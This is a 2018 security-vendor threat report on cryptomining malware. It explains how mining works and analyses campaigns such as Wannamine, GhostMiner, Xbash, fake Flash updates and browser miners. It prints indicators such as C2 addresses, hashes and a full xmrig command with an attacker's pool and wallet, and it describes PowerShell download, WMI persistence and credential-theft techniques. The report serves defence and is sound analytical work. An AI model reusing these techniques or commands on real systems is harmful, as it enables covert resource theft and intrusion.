top 10 cryptomining malware … · the webassembly(wasm)12 technology solves this to an extent. it...
TRANSCRIPT
Top 10 Cryptomining MalwareVERSA NETWORKS TOP 10 REPORT FOR 2018
2018 TOP 10 CRYPTOMINING MALWARE
Cryptomining In cryptomining, one uses computer resources, such as CPU cycles, to “mine” the currency. Cryptocurrency has become a sought-after entity to make an easy profit. This means Internet users have one more thing to look out for, with the rise in ransomware and cryptomining attacks. The trend in 2017 saw numerous ransomware campaigns which attacked systems by encrypting files, and withholding the key code in exchange for ransom. This year, there is a shift toward cryptomining/cryptojacking attacks1,2, especially with the increase in the cryptocurrency market rates. We will examine how mining works, and its underlying technology - blockchain.
How Cryptomining Works
Cryptocurrencies were developed to allow payments in an untrusted environment without having to depend on a third-party, but only on cryptographic proof. The cryptographic proof involves mathematical operations that are computationally impractical to reverse or modify transactions, in order to achieve profit or allow double spending. Cryptocurrency became popular with the introduction of Bitcoin3, which proposed to implement electronic transactions based on cryptography, with blockchain as the underlying technology. Bitcoin uses blockchain as a decentralized, distributed ledger on a peer-to-peer network to validate the transactions and prevent double spending.
Blockchain works like a storage system to hold the transactions. The transactions are collected into blocks, and are added to the previous blocks to build the chain. Since the ledger and the new transactions are available to all parties of the network, it can be validated by all, and cannot be altered, without a majority among members in the network. In the structure of blockchain as implemented by Bitcoin, the main components are the hash of previous chain, details of transactions, and a nonce. Since it is difficult to hold the data of all the transactions, a hash of the existing blockchain is calculated and used as an element in the next block. It also works as a link to the previous block to navigate the chain.
In 2017, cryptocurrency mining detections climbed from around 75,000 detections in the first half of the year to about 326,000 in the second half.Compared to the previous half year, the first half of 2018 saw a 141-percent increase in cryptocurrency mining detections.1
2018 TOP 10 CRYPTOMINING MALWARE
Previous Hash
Transaction Details
Nonce
Previous Hash
Transaction Details
Nonce
Previous Hash
Transaction Details
Nonce
Fig #1: Blockchain Representation
All the transactions using bitcoins are broadcasted to the network. The members create a block by collecting these transactions. The members on the network provide validation for the various transactions by solving a cryptographic problem to commit that block to the chain. It is verified by a majority of the members in the network, before being committed to the blockchain. The numerous cryptocurrencies arise from the different consensus algorithms they use to implement the method for validation - like proof of work, proof of stake etc. Most cryptocurrencies implement proof of work, which requires members to spend a significant amount of CPU cycles to solve the block, and as an incentive the members receive an amount of cryptocurrency. This process is called mining, and the members verifying the transactions are the miners.
Bitcoin technology employs Hashcash4 proof of work. This algorithm requires the miners to find a block that returns a hash value which begins with a specific number of zeros. The miners create a block by collecting these transactions along with the previous hash of the chain and a nonce. The systems in the network then change the nonce until they achieve the hash of the required specifications which indicate the proof of work spent by the system. The first system to achieve the proof of work broadcasts its nonce and hash to the rest of the network to let them verify it. If the nodes verify
the submitted hash, it will start working on the next block with the new hash.
These blocks are chained together with the future transactions added. It requires an enormous amount of CPU power to redo all the blocks to alter any transaction in the previous block. As long as a majority of the systems in the network are not corrupted, they cannot pool their CPU power to alter the previous transaction and create a branch in the chain.
Cryptocurrency mining requires a person to have a cryptocurrency wallet, the mining hardware/software to mine, electricity, and Internet connectivity. The mining software solves the cryptographic hash and provides the bookkeeping service to track the transactions. Thus, the miners need electricity and resources to convert them into the cryptocurrency. The difficulty of finding the hash is varied at intervals, depending on factors like the number of miners in the network. The rate at which a mining machine operates is defined as hashrate. With increase in difficulty, the hashrate also needs to
2018 TOP 10 CRYPTOMINING MALWARE
be increased to mine efficiently. Initially, bitcoin mining software were run on CPUs, but to increase the hashrate, miners upgraded to GPU, followed by FPGA. But high -power consumption by FPGA became unprofitable, thus giving way to Application Specific Integrated Chips (ASICs), which were developed with the sole use of mining in mind5.
The methods of mining have also evolved from just using one’s own hardware. Miners have started joining a membership to data centers that host mining software, and use cloud resources to mine coins. To keep up with the high computational power requirement, miners now pool their resources to work on a hash problem, and split the cryptocurrency mined. The Bitcoin algorithm for finding hash is more computationally intensive, so many other currencies have come up with a less complex hashing algorithm, that works efficiently with CPU only, and these have gained popularity after Bitcoins.
All of this requires an initial investment to buy the hardware, or for power. Attackers have resorted to hijacking other user’s resources to utilize for their mining process, without detection. This illicit method of cryptomining is called cryptojacking. In cryptojacking, the miner software utilizes high CPU consumption, preventing the system from allocating CPU for its legitimate process, and leading to overheating. Many security firms are vigilant about detecting the presence of mining software to prevent its execution. We will look into some of the crytpomining incidents of 2018 in the following report.
2018 TOP 10 CRYPTOMINING MALWARE
Cryptomining MalwareCryptocurrency has become the latest trend in the cyber world, and no time has been wasted in exploiting its features to earn a quick profit. As seen by reports from 1,2, cryptomining is all the talk for 2018. The campaigns indicate that attackers target a wide range of sources, from large data centers, like Tesla’s Cloud6, to mobile devices and IoT devices. In short, any device that can provide CPU cycles and electricity is vulnerable.. There were also recent reports on the increase in mining activities in iOS devices7. We also see a variety of miners and the varied techniques the attackers use to distribute, as well as evade detection. Here we look at some campaigns and miners in 2018.
Distribution Mechanisms and Evasion Techniques
Cryptomining is exploited via different methods by the attackers to achieve a profit. There are malwares that drop the mining software as its payloads. These payloads are dropped into the victim machine, and executed to utilize the victim’s CPU cycle to mine and fill the attacker’s wallets. Some previously present malware, with other payloads like information stealers and others, incorporate mining components as secondary payloads. This allows the miners to spread the software along with other infections. On analyzing some samples, it was seen that the general techniques involve using known vulnerabilities to deliver the miner payload to servers, using powershell or shell scripts to download the miners, or perform lateral movements to spread infection within a network.
One of the methods that is being implemented on a wide scale is browser-based mining, with the introduction of Coinhive8 API for mining popularized browser-based mining. The technology, as such, is not malicious, but running it without the user’s knowledge makes it malicious. It allows sites to make money by running the mining scripts on website, instead of displaying advertisements. But many sites have switched to mining without informing the users. This method is also exploited by attackers in compromised websites, where even the website owner is unaware of the script running and draining the victim’s resources.
Some recent reports have identified a cryptominer that targets Linux systems with an interesting feature in the form of a rootkit component9, and another Windows-based miner that disguises itself as a Windows Installer file10. Rootkits allow malicious programs to be hidden from monitoring tools. This helps the miner process to evade detection. However, it cannot hide the performance degradation or high CPU usage commonly seen when a miner executable is running. Though the system shows maximum CPU utilization, rootkit prevents the process, causing the CPU surge to be detected. In the case of an MSI file, being a Windows installer, it will not be suspected immediately, and can evade some security filters. The file installs a number of files that include scripts to delete anti malware processes, as well as files to support the installation of the miner. They also mention the usage of Windows Installer Builder WiX as a packer to further obfuscate the file. Similar to this, the attackers explore many obfuscation methods, like encoding, compression, adding unwanted bytes and instruction, to modify the files and evade detection.
2018 TOP 10 CRYPTOMINING MALWARE
Web Based Cryptomining11
Monero mining makes use of CryptoNight as the underlying mining algorithm, which later gave way to the possibility of porting the algorithm to a javascript to use with the normal PC, instead of the algorithms which ran efficiently only with the ASIC. This gave rise to the possibility of mining within any browser that supports javascript. This appeals to attackers, because of the ease of deploying these miners. The traditional miners have to be dropped inconspicuously in the victim machine, and also employ persistence techniques to ensure a long run. While web-based mining only required them to inject the code into a website, and when a victim visits the website the CPU cycles are robbed to mine currencies for the attacker’s wallet. The drawback with web-based mining is it is inefficient compared to a miner executable, and it only runs when the page containing mining script is open in the browser. The WebAssembly(Wasm)12 technology solves this to an extent. It is a binary instruction format for stack-based virtual machines. This works as a target for high-level languages like C/C++ to be deployed on web-based client/server application. It also aims to achieve native speed execution, and thus is an appealing solution to implement the miner code. Web-based cryptomining was popularized with the introduction of Coinhive, followed by many similar web-based miners like Cryptoloot13, CoinImp14, etc.
The mining malware distribution went up with the increase in cryptocurrency value, especially when teamed with the easy availability of a browser-based miner that does not require attackers to inject the miner executables into a system. The attackers only had to redirect the victims to the infected websites.
Wannamine
Even after the havoc created by Wannacry ransomware, many devices still remain unpatched, making them vulnerable to exploitation. Wannamine, a crypto-mining malware that uses a similar technique of SMB vulnerability, is still found to be prevalent15. Wannamine mines Monero currency, and usually infects the system through phishing emails or downloads from compromised websites. The malware infects a system and makes use of WMI, as well as powershell, to run mimikatz and get the login details of other systems in the network. It also makes an attempt to infect others in the network through the SMB vulnerability that allowed the spread of Wannacry. Upon analysis, using some samples of the Wannamine malware, we were able to see the files in the initial stage of infection as large ascii text files. They include large strings obfuscated with various techniques, including base64 encoding. These strings revealed to be powershell scripts, which on de-obfuscation exposes commands that use WMI, and also contains the executable of the Monero Miner, as well as the Mimikatz tool.
LifecycleThe sample 28287cbcdfde7fb90d504e658520a7b63c9a65640a96456e551ebda1c1ac73ee is a large ascii text file with a variable fa having a base64 string, as well as another long obfuscated string. On de-obfuscation of the string, we get a powershell script. It has a command to split the string fa into funs, mimi, mon, sc, vcr, vcp
2018 TOP 10 CRYPTOMINING MALWARE
Fig 1: Script to split string into components
The script checks using WMI object if system architecture is 64 bit, if not it will download powershell script from : 195[.]22.127.157:8000 or 93[.]174.93.73:8000
Fig 2: Check for 64-bit OS
It creates a new management class with scope root\default, with name ‘Win32_Services’ and adds properties mimi, mon, vcp,vcr,funs,sc, ipsu and i17. The script decodes base64 of the funs to get the script that contains the functions and executes it.
The main script goes ahead and checks for files msvcp120.dll and msvcr120.dll. If not present, it will place files vcp and vcr obtained after de-obfuscation in that location, which allows us to conclude vcp and vcr are the corresponding dlls required for proper execution of the script.
Fig 3: DLL required for execution of executable
The script checks the WMI objects with filter-consumer-binding and removes the object which does not contain “DSM Event Log”. The malware can make use of the WMI event to achieve persistence in system. A WMI event subscription requires a filter to query, a consumer to define what action to be taken, and a binding to associate the filter and the consumer.
2018 TOP 10 CRYPTOMINING MALWARE
Fig 4: Commands to create WMI event
The script also enumerates the list of TCP connections, checks if a foreign address contains ports 3333, or 5555, and if that connection is established. If so, it adds the process id to a list, and stops the process. It is seen that ports 3333,5555, 7777 are among the most commonly used ports for mining purposes, hence it checks if any other mining processes might be running. It also checks all the processes to see if any are running a powershell, aand if any process is listed in TCP connection established from port 80. If these conditions pass, it sets a flag. The script will start a powershell as noprofile, non-interactive and hidden window, which decodes funs from base64, executes it and calls an invoke-command commandlet with mon as argument. These commands run the miner from within the powershell.
Fig 5: Command to run scripts that call miner executable
The other portions of string have a call get-creds function, to get credentials of systems on the same network as the infected system. Using these credentials, the malware infects other systems using eternalblue vulnerability.
2018 TOP 10 CRYPTOMINING MALWARE
Fig 6: Loop checking IPs for eternal-blue vulnerability for infection.
Fig 7: FlexVNF AV Detection of Wannamine Samples
MIRUS
MIRUS is an example of a virus infection, but it was reported to also contain the functionality of injecting cryptomining scripts16. One of its functions is to infect specific files in a system with a virus, by prepending malicious code to it. In addition, it searches for html and htm files to inject a javascript for calling the Coinhive miner. When these html files are opened, the javascript executes to connect to the coinhive. The coinhive.min.js script in it uses the CPU cycles to mine and collect the currency in the wallet specified in the script.
2018 TOP 10 CRYPTOMINING MALWARE
Fig 8: Coinhive script to be appended to html files
Fig 9: List of file types Mirus targets
Fig 10: FlexVNF AV detection
GhostMiner
Fileless malware is another buzzword. Ghost Miner, a Monero cryptominer, was first seen in March 2018, and exhibits fileless evasion. The miner malware achieves this with Powershell Evasion frameworks, like Out-Compressed DLL and Invoke-Reflective PE Injection. According to a report when the malware was discovered, the account wallet linked to the campaign only collected 1.03 XMR17. Even though the miner only mined a small amount, the techniques used by malware were advanced in trying to achieve fileless execution.
We began our analysis with the IOC of C2 IP address 123[.]59[.]68[.]172 in VirusTotal. A
search on the passive DNS queries, showed it downloads four files of which two are detected as malicious. The malicious files were 32-bit binaries flagged as Coinminers by most.
We analyzed 3 powershell scripts related to this attack
Neutrino.ps1/Nitro.ps1 : 9a326afeeb2ba80de356992ec72beeab28e4c11966b28a16356b43a397d132e8
WMI.ps1 : 40a507a88ba03b9da3de235c9c0afdfcf7a0473c8704cbb26e16b1b782becd4d
WMI64.ps1 : 8a2bdea733ef3482e8d8f335e6a4e75c690e599a218a392ebac6fcb7c8709b52
All three powershell scripts have employed similar Out-Compresses DLL technique to evade detection by the antivirus engine. The technique takes a powershell script, compresses it, base64 encodes it, and is initially successful in evading the security tools by many vendors.
2018 TOP 10 CRYPTOMINING MALWARE
On de-obfuscating Nitro.ps1, we get a powershell script with code that implements Invoke Reflective PE Injection, which allows base64 encoded data to be passed as the PE/DLL to be injected into a process. Reflective injection technique injects PE/DLL to be loaded into another process directly from memory, without writing the executable to disk, and avoiding detection by many monitoring tools that track file write. The base64 encoded data is decoded to obtain a DLL.
Fig 11: Calling Reflective PE Injection with base64 encoded data.
Analyzing the DLL showed two other addresses, VoidFunc and ShellMain, within its export list, apart from the Dll entry Point. The Reflective PE Injection command calls the VoidFunc, which calls ShellMain with argument “http://123.59.68.172/Cache/Tunnel.php” in the stack. The ShellMain is the main function in the DLL that is used to find the servers for exploiting and spreading the infection. The strings “CrackWebLogic”, “CrackSQL”, and a list of strings resembling commonly used passwords, further suggest the executable tries brute-forcing the password to gain access to poorly protected systems.
WMI.ps1, once decompressed and Base64 decoded, results in a powershell script that has commands to connect the miner to the mining pool, and also achieves persistence with the help of WMI objects.
Fig 12: Commands creating WMI events
The file “lsass.exe” downloaded from 123[.]59[.]68[.]172 acts as the miner executable, while the script will initiate its execution with the mining pools with the cryptowallet details.
Fig 13: Miner executable
2018 TOP 10 CRYPTOMINING MALWARE
Fig 14: Commands connecting the executable to the mining pool
The payload also contains a module named Killer, to kill other cryptomining processes running in the system. It checks for lists of services, scheduled tasks, and command-line arguments that are commonly seen in commands invoking miners. It will search for processes that establish TCP connections with , usually used by cryptominers to communicate with mining pools and popular miner executables.
Fig 15: Processesand services targeted by Killer component
The WMI64.ps1 has similar modules to create Miner and Killer, but targets 64-bit OS. It performs a check, if the OS is 64-bit, before continuing with its execution. The decompressed script has obfuscated strings as a variable that is a 64-bit executable of the XMrig miner. The executable also contains strings that point to the same cryptowallets and mining pools.
2018 TOP 10 CRYPTOMINING MALWARE
Fig 16: Strings present in 64-bit miner executable
Fig 17: FlexVNF AV detection
Fake Flash Updates
Using Flash Updates to distribute cryptominer executables is among the recent campaigns in cryptojacking. This was reported along with a list of sample executables and collected IOC18. Though there were many previous attempts to hide different malware in Flash updates, this particular case stood out. It had legitimate looking Adobe popups for installation, along with updating Flash player to the latest version. These smokescreens easily lull the unsuspecting user.
In analyzing a sample, it shows that the primary executable drops two executables. The binary for the executable is present within the initial executable, which gets extracted to a temp folder, and written to the path %appdata%\Roaming\xbooster\Manager.exe and %appdata%\Roaming\xbooster\xmrig.exe. The primary executable creates the process for the xmrig.exe, and exits while the rest of the mining and communication is carried out by xmrig.exe.
The command “C:\Users\<USER>\AppData\Roaming\xbooster\xmrig.exe -o stratum+tcp://xmr-eu1.nanopool.org:14444-u4JUdGzvrMFDWrUUwY3toJATSe
2018 TOP 10 CRYPTOMINING MALWARE
Nwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRzL9pCSYqvM4EaC4kh/2 -p x --donate-level=1 -B --max-cpu-usage=90 -t 1” executes xmrig.exe with parameters for login as command line arguments.
This tries to connect with the mining pool with the given login parameters. The packet capture during the execution shows the communication of miner process with the pool. The miner software connects with the mining pool, communicating over port 14444 throughout its execution.
Fig 18: Pcap showing connection to miner pool
The exchange is in json format, that indicates an initial login request and reply. This is followed by requests for new miner jobs. The presence of placeholder strings for keepalive and submit methods indicate further communications. The executable provides reply to keepalive requests by mining the pool. It also gives a submit request with nonce that produces the hash answer for the mathematical challenge of proof of work to be verified by the rest of the systems in the mining network.
Fig 19: Strings in miner executable indicating communication with miner pools
The CPU consumption of the system stays at a constant peak above 90% for the process xmrig.exe. This would lead to degradation of system performance, and prevent other legitimate processes from getting CPU time for their execution.
Fig 20: The executable drops the files in temp folder and causes CPU to surge to above 90%
2018 TOP 10 CRYPTOMINING MALWARE
Fig 21: FlexVNF AV detection
Xbash
A recently discovered new malware family, Xbash, targets both the Linux and Windows servers16.The findings show it was developed from Python code, and it combines ransomware, mining, and botnet, as well as self-propagation techniques.
As part of a Linux infection, the files r88.sh, which was a bash file that checks if the root privilege is present - depending on which it downloads, either the lowerv2.sh or rootv2.sh bash scripts. If found to have root privileges, it also schedules cron jobs of itself.
Both scripts contain commands to kill a list of processes, like rivaling cryptominers, process using specific ports, and remove the related files. The following files can then be downloaded:Config.json Bashf : Pools.txtBashg :XbashY/xapache, both of which are 64 bit elf.
Fig 22: Script to kill mining process
2018 TOP 10 CRYPTOMINING MALWARE
In the case of a Windows infection, we looked at f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8, which was a jscript that ran a powershell command to download tg.jpg and execute it.
Fig 23: Obfuscated script to run powershell.
One of the samples, 725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054 (reg9.sct) contains an encoded command in powershell, which on execution schedules tasks with name “Update”.
Another sample d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6, is a PNG file appended with a base64 encoded executable, which contains strings associated with miner executables, like the json string placeholder to submit hashes. Similarly, the sample ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50 is a dll that contains code references similar to miner executables.
Fig 24: FlexVNF AV detection
2018 TOP 10 CRYPTOMINING MALWARE
CoinHive
Coinhive is a web-based cryptominer that uses javascript to perform mining operations. Javascript- invoking miners can be placed on websites, and when a browser visits the site, it uses the system CPU to perform mining. Of the total earnings mined, 30 percent goes to Coinhive, and the rest is received by the wallet specified in the script. Piratebay initially experimented using Coinhive to mine instead of monetizing on advertisements. Some charity websites also host it, but with disclosure of using CPU for mining. Coinhive scripts were also seen in Google’s DoubleClick20. The affected page showed miner script, along with the script to display the actual advertisement. A lot of streaming sites also host this, as users spend a long time on such sites.
Fig 25: Captcha to achieve proof of work
Fig 26: Example javascript template that is usually injected into website for mining.
Cryptoloot
Cryptoloot is very similar to Coinhive. The major difference is that Cryptoloot only keeps 12 percent of the mined coins, and gives the rest to the website owners, compared to Coinhive’s 30 percent take. Cryptoloot advertises itself as stealthy and un-intrusive. It uses crypto-loot.com and cryptoloot.pro as domains for its operations. As per Checkpoint reports, it is among the top cryptomining threats after Coinhive2.
Some of the major campaigns within web-based mining include, capitalizing on the vulnerabilities in CMS websites to host the script, by using obfuscated short links of the Coinhive miner. Another major attack in the campaign involves unpatched Mikrotik routers compromised to push pages with miner scripts. In this case, all the browsers that are behind the infected router mine, as the attack also causes the router to push miner script into them.
Shortlink Coinhive URL
A campaign using a shortlink of the Coinhive URL was reported21. Coinhive provides an option to allow website owners to include the shortlink to mine, with the CPU of users when forwarding to another site.
2018 TOP 10 CRYPTOMINING MALWARE
Fig 27: Example Coinhive shortlink5
This was misused by injecting it in an iframe of size 1x1, which is easily missed by a normal user when a miner is running in the background. The shortlink, by nature, does not show the details of the exact page it is going to, until the browser loads it, and thus can misdirect users to click it , allowing malicious sites to be loaded. Researchers went on to find a larger operation which not only catered to drive-by mining, but also directed users to fake download pages that dropped miner executables in Linux or Windows22.
Mikrotik Routers
The cryptomining campaign involving the Mikrotik routers was discovered towards the end of July 201823. The initial infection was reported across Brazil, and later spread to many other parts of the world. The exploit is based on a Winbox vulnerability that was disclosed and patched by the Mikrotik routers. But many of the router users failed to apply this patch in a timely manner and it led to a significant attack. When a user under the infected router tries to access http sites, the router returns a custom 403 error page that hides within itself a script. The script runs the miner in the browser. It also loads the original website in an iframe in about 10s, and the miner continues to run in the background. Thus, an unsuspecting user does not detect anything to be wrong and continues browsing.
The various campaigns analyzed here display the different techniques used by attackers to evade detection and achieve mining. Users have to employ proper security practices, timely patches and updates to stay ahead of the attackers and thwart mining attacks. Versa Networks detects the scripts or executables related to the attacks and prevents the download of the infected components, thus protecting the systems from unwanted miners.
2018 TOP 10 CRYPTOMINING MALWARE
Samples
Malwares Hashes File Name
Wannamine 038d4ef30a0bfebe3bfd48a5b6fed1b47d 1e9b2ed737e8ca0447d6b1848ce309
CM_WM1
28287cbcdfde7fb90d504e658520a7b63c 9a65640a96456e551ebda1c1ac73ee
CM_WM2
2c3351d6664f59e94dca0408d94ebf2c9a d02211178c798f8e338a223b414e1f
CM_WM3
6bfb5cac35630952ca36c23fedbefbe07bc 2e9dc46ff15e47baff4c1c89297cf
CM_WM4
fab7ef7833704763e7bf2b6d938294fa9b61 3f524c8f76117726997a4f7edd28
CM_WM5
Ghostminer 68668ce862a107a66723cdb9edaaf69b78a 184c0dd8d494fcaa29e5b89e7418f
CM_GM1
97e1338de44f8c8799e2d0e0f32a1362a60 84004ec64c754950e8bde50a33735
CM_GM2
9A326AFEEB2BA80DE356992EC72BEEA B28E4C11966B28A16356B43A397D132E8
CM_GM3
40A507A88BA03B9DA3DE235C9C0AFDF CF7A0473C8704CBB26E16B1B782BECD4D
CM_GM4
8a2bdea733ef3482e8d8f335e6a4e75c690 e599a218a392ebac6fcb7c8709b52
CM_GM5
Fake Flash Updates 067885f6d2fda299d4e89134c86c9d6889 23c43b83185999565a81528e47bafa
CM_FFU1
6aa3d31735dc3453f3675d7ac200aee7a25 e6e77a94ad31fdfb66c9e6b86d89b
CM_FFU2
816f19795db6dff50fb2913adc14fc7f0fa6b55 cc9d1f2f4330414dbff56dace
CM_FFU3
a22b50d4f18b2fc92bdcffc01281c40cd4ed1 d2bd9364fce91ea484a37bf3725
CM_FFU4
Xbash 0b9c54692d25f68ede1de47d4206ec3cd2e 5836e368794eccb3daa632334c641
CM_XB1
7a18c7bdf0c504832c8552766dcfe0ba33dd 5493daa3d9dbe9c985c1ce36e5aa
CM_XB2
d7fbd2a4db44d86b4cf5fa4202203dacfefd 6ffca6a0615dca5bc2a200ad56b6
CM_XB3
ece3cfdb75aaabc570bf38af6f4653f73101c1 641ce78a4bb146e62d9ac0cd50
CM_XB4
31155bf8c85c6c6193842b8d09bda88990d 710db9f70efe85c421f1484f0ee78
CM_XB5
725efd0f5310763bc5375e7b72dbb2e883ad 90ec32d6177c578a1c04c1b62054
CM_XB6
Mirus bb987f37666b6e8ebf43e443fc4bacd5f0ab 795194f20c01fcd10cb582da1c57
CM_MIRUS
2018 TOP 10 CRYPTOMINING MALWARE
References:1 https: //documents.trendmicro.com/assets/rpt/rpt-2018-Midyear-
Security-Roundup-unseen-threats-imminent-losses.pdf
2 https://blog.checkpoint.com/2018/07/12/cyber-attack-trends-2018/
3 https://bitcoin.org
4 http://www.hashcash.org/
5 https://cseweb.ucsd.edu/~mbtaylor/papers/Taylor_Bitcoin_IEEE_Computer_2017.pdf
6 https://redlock.io/blog/cryptojacking-tesla
7 https://www.checkpoint.com/press/2018/september-2018s-most-wanted-malware-cryptomining-attacks-against-apple-devices-increase-sharply/
8 https://coinhive.com/
9 https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth
10 https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-malware-uses-various-evasion-techniques-including-windows-installer-as-part-of-its-routine/
11 https://www.forcepoint.com/blog/security-labs/browser-mining-coinhive-and-webassembly
12 https://webassembly.org/
13 https://crypto-loot.com/
14 https://www.coinimp.com/
15 https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry
16 https://blogs.quickheal.com/mirus-cryptomining-virus/
17 https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless
18 https://researchcenter.paloaltonetworks.com/2018/10/unit42-fake-flash-updaters-push-cryptocurrency-miners
19 https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/
20 https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/
21 https://blog.sucuri.net/2018/05/cryptomining-through-disguised-url-shorteners.html
22 https://blog.malwarebytes.com/threat-analysis/2018/07/obfuscated-coinhive-shortlink-reveals-larger-mining-operation/
23 https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/
Versa Networks, Inc, 6001 America Center Dr, 4th floor, Suite 400, San Jose, CA 95002
+1 408.385.7660 | [email protected] | www.versa-networks.com
© 2018 Versa Networks, Inc. All rights reserved. Portions of Versa products are protected under Versa patents, as well as patents pending. Versa Networks and FlexVNF are
trademarks or registered trademarks of Versa Networks, Inc. All other trademarks used or mentioned herein belong to their respective owners. Part# SR_T10CRYPT18-01.1